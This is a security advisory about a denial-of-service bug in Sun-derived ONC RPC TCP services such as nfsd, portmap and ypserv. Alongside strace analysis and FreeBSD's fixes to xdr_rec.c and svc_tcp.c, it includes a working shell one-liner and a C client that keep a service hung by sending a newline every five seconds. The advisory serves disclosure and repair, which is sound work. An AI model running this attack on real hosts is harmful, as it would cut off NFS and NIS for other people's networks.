COMMAND
RPC apps
SYSTEMS AFFECTED
Linux, FreeBSD, SunOS, System V and NeXTstep
PROBLEM
This is something Juggler found; Peter van Dijk investigated the
problem further.  If you connect (using telnet, netcat, anything)
to a TCP port assigned to some RPC service (tested with
rpc.nfsd/mountd/portmap on Slackware 3.4/Kernel 2.0.33) and send
some 'garbage' (like a newline) every 5 seconds or faster, the
service will completely stop responding.  The moment the
connection is closed, the service returns to normal operation.
strace shows the following (from rpc.nfsd [nfs-server-2.2beta29]):
alarm(5) = 0
sigreturn() = ? (mask now [])
select(256, [4 5], NULL, NULL, NULL) = 1 (in [5])
accept(5, {sin_family=AF_INET, sin_port=htons(12406),
sin_addr=inet_addr("127.0.0.1")}, [16]) = 0
select(256, [0 4 5], NULL, NULL, NULL) = 1 (in [0])
select(256, [0], NULL, NULL, {35, 0}) = 1 (in [0], left {35, 0})
read(0, "\r\n", 4000) = 2
The connection is accepted, after which a new select is started
with both old file descriptors (the TCP and UDP listening sockets)
and the new connection.  Then some data arrives on the new
connection, after which select is started with _only_ this
connection as a parameter.  Then a read is started, which can only
be aborted by dropping the connection or by SIGALRM (which fires
after 5 seconds).  Right about that time, another newline is sent,
restarting the whole loop.
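The server-side pattern behind this trace is the readtcp()-style
helper in svc_tcp.c.  Roughly (a sketch, not the verbatim library
source):

#include <sys/select.h>
#include <sys/time.h>
#include <unistd.h>

/*
 * Sketch of the readtcp()-style helper behind the trace above:
 * select() on the one connected socket with a fixed timeout, then
 * block in read().  While this runs, the listening sockets are
 * never looked at, so nobody else gets served.
 */
static int
readtcp(int sock, char *buf, int len)
{
    struct timeval timeout = { 35, 0 };   /* the {35, 0} in the trace */
    fd_set readfds;

    FD_ZERO(&readfds);
    FD_SET(sock, &readfds);
    if (select(sock + 1, &readfds, NULL, NULL, &timeout) <= 0)
        return (-1);                      /* timed out, or error */
    return (read(sock, buf, len));        /* blocks until data or EOF */
}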
This bug can easily be exploited remotely without any special
software and without using any noticeable bandwidth (one packet
every 5 seconds).  This one-liner works perfectly:
$ { while true ; do echo ; sleep 5 ; done ; } | telnet localhost 2049
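The same attack as a minimal C client, for illustration (a sketch;
host and port are the ones from the telnet example above):

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/socket.h>

int main(void)
{
    struct sockaddr_in sin;
    int s = socket(AF_INET, SOCK_STREAM, 0);

    if (s < 0) {
        perror("socket");
        return 1;
    }
    memset(&sin, 0, sizeof(sin));
    sin.sin_family = AF_INET;
    sin.sin_port = htons(2049);                   /* nfsd, as above */
    sin.sin_addr.s_addr = inet_addr("127.0.0.1");
    if (connect(s, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
        perror("connect");
        return 1;
    }
    /* One newline every 5 seconds: each one arrives just as the
     * SIGALRM aborts the pending read(), restarting the loop, so
     * the service never gets back to its listening sockets. */
    for (;;) {
        if (write(s, "\n", 1) != 1)
            break;
        sleep(5);
    }
    return 0;
}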
Replacing the sleep 5 with sleep 6 or more shows the service
responding every once in a while: with a gap of more than 5
seconds, the SIGALRM aborts the read before the next newline
arrives, so the main loop briefly gets to run.  Further
examination shows that rpc.pcnfsd and rpc.ypxfrd are probably also
vulnerable, as are most other RPC applications that support TCP.
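To find out which RPC services on a host are reachable over TCP in
the first place, ask the portmapper.  rpcinfo -p lists every
registered program; the output below is illustrative (ports for
mountd and friends vary per host):

$ rpcinfo -p localhost
   program vers proto   port
    100000    2   tcp    111  portmapper
    100000    2   udp    111  portmapper
    100003    2   udp   2049  nfs
    100003    2   tcp   2049  nfs
    100005    1   tcp    635  mountd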
FreeBSD-current seems to have the problem too (tested against both
amd and the portmapper).  The amd case is sort of amusing, as it
means that any access through it will *hang* for as long as the
attack is in progress.  The portmapper on SunOS 4.1.3 was tested
as well, with similar results.
Anything that depends on NFS to function can be shut down
completely (temporarily, that is) with little or no effort... You
don't need maths to see that even someone on a simple 28k8 line
can shut down hundreds of sites at the same time.  Affected
applications include nfsd, ypserv, ypbind and portmap.  Whole
networks could easily be brought down by aiming this DoS at nfsd
and/or ypserv.  If a site depends on NIS for its user lists, mail
and ftp won't work during the attack.
This bug is likely present in all Sun-derived ONC RPC
implementations, including TI-RPC from ONC+, which is what you'll
find in Solaris 2.x and AIX 4.2 and up.  TI-RPC uses the same XDR
record-marking code, although it has an svc_vc.c module to handle
virtual-circuit transports rather than a transport-specific
svc_tcp.c module.  See the 'Solution' section for more details.
SOLUTION
The bug is in Sun's RPC code; FreeBSD has addressed it.  The real
problem is in the XDR record-marking code used for the TCP
transport.  (In RPC 4.0, TCP is the only transport affected; in
TI-RPC, any 'virtual circuit' transport, including but not limited
to TCP, is affected.)  The set_input_fragment() routine in
src/lib/libc/xdr/xdr_rec.c attempts to read a record header which
is supposed to specify the size of the record that follows.
Unfortunately, this routine performs no sanity checking: if you
telnet to a TCP service and send a few carriage returns,
set_input_fragment() misinterprets them as a ridiculously large
record size. This in turn causes the fill_input_buffer() routine
to try reading a ridiculously large amount of data from the
network. This is why the service stays wedged until you
disconnect. The patch FreeBSD made to fix this is as follows:
*** xdr_rec.c.orig Fri May 15 17:43:57 1998
--- xdr_rec.c Fri May 15 17:47:58 1998
***************
*** 550,555 ****
--- 550,561 ----
return (FALSE);
header = (long)ntohl(header);
rstrm->last_frag = ((header & LAST_FRAG) == 0) ? FALSE : TRUE;
+ /*
+ * Sanity check. Try not to accept wildly incorrect
+ * record sizes.
+ */
+ if ((header & (~LAST_FRAG)) > rstrm->recvsize)
+ return(FALSE);
rstrm->fbtbc = header & (~LAST_FRAG);
return (TRUE);
}
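To see concretely what this check rejects, here is how four bytes
of 'garbage' decode as a record header (a small standalone
program; LAST_FRAG is the top bit of the header, as in xdr_rec.c):

#include <stdio.h>
#include <string.h>
#include <stdint.h>
#include <arpa/inet.h>

#define LAST_FRAG 0x80000000UL  /* top bit of the record header */

int main(void)
{
    /* Two CR/LF pairs, as they arrive on the wire and get read
     * as a 4-byte record header by set_input_fragment(). */
    unsigned char junk[4] = { '\r', '\n', '\r', '\n' };
    uint32_t header;

    memcpy(&header, junk, sizeof(header));
    header = ntohl(header);

    printf("last fragment: %s\n", (header & LAST_FRAG) ? "yes" : "no");
    printf("fragment size: %lu bytes\n",
           (unsigned long)(header & ~LAST_FRAG));
    /* Prints 218762506 -- far beyond rstrm->recvsize, so the
     * patched set_input_fragment() returns FALSE instead of
     * letting fill_input_buffer() try to read ~218MB. */
    return 0;
}

Since rstrm->recvsize is only a few kilobytes (the trace above
shows a 4000-byte read buffer), the new comparison rejects such a
header immediately.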
The next change relates to the svc_tcp.c module directly. The
svctcp_recv() routine calls xdr_callmsg() to attempt to decode the
RPC message header that should accompany every RPC request. With
the UDP transport, a datagram that doesn't contain a valid header
is dropped on the floor. With TCP, the connection is left open to
attempt to receive another request that may be pending. If no
valid message header is found where there should have been one,
the connection should be dropped. The following patch to
src/lib/libc/rpc/svc_tcp.c does this:
*** svc_tcp.c.orig Fri May 15 17:11:21 1998
--- svc_tcp.c Fri May 15 17:09:02 1998
***************
*** 404,409 ****
--- 404,410 ----
cd->x_id = msg->rm_xid;
return (TRUE);
}
+ cd->strm_stat = XPRT_DIED; /* XXXX */
return (FALSE);
}
This marks the transport handle as dead if xdr_callmsg() fails,
which in turn will cause the dispatcher to drop the connection.
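For context, the dispatcher's side of this looks roughly as
follows (a sketch modelled on the svc_getreq() loop in Sun's
rpc/svc.c; dispatch_request() is a hypothetical stand-in for the
real procedure lookup):

#include <rpc/rpc.h>

/* Hypothetical stand-in for the real procedure lookup and reply. */
extern void dispatch_request(SVCXPRT *xprt, struct rpc_msg *msg);

/* Sketch of the per-descriptor dispatch loop: once svctcp_stat()
 * reports XPRT_DIED (because svctcp_recv() set cd->strm_stat),
 * the handle is destroyed and the TCP connection closed. */
void serve_one_fd(SVCXPRT *xprt, struct rpc_msg *msg)
{
    enum xprt_stat stat;

    do {
        if (SVC_RECV(xprt, msg))    /* FALSE when xdr_callmsg() fails */
            dispatch_request(xprt, msg);
        stat = SVC_STAT(xprt);
    } while (stat == XPRT_MOREREQS);

    if (stat == XPRT_DIED)
        SVC_DESTROY(xprt);          /* drops the connection */
}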
With these patches, you have 35 seconds to supply a valid record
containing an RPC message header and request, otherwise the
session is disconnected. If you enter garbage data, the connection
is dropped immediately.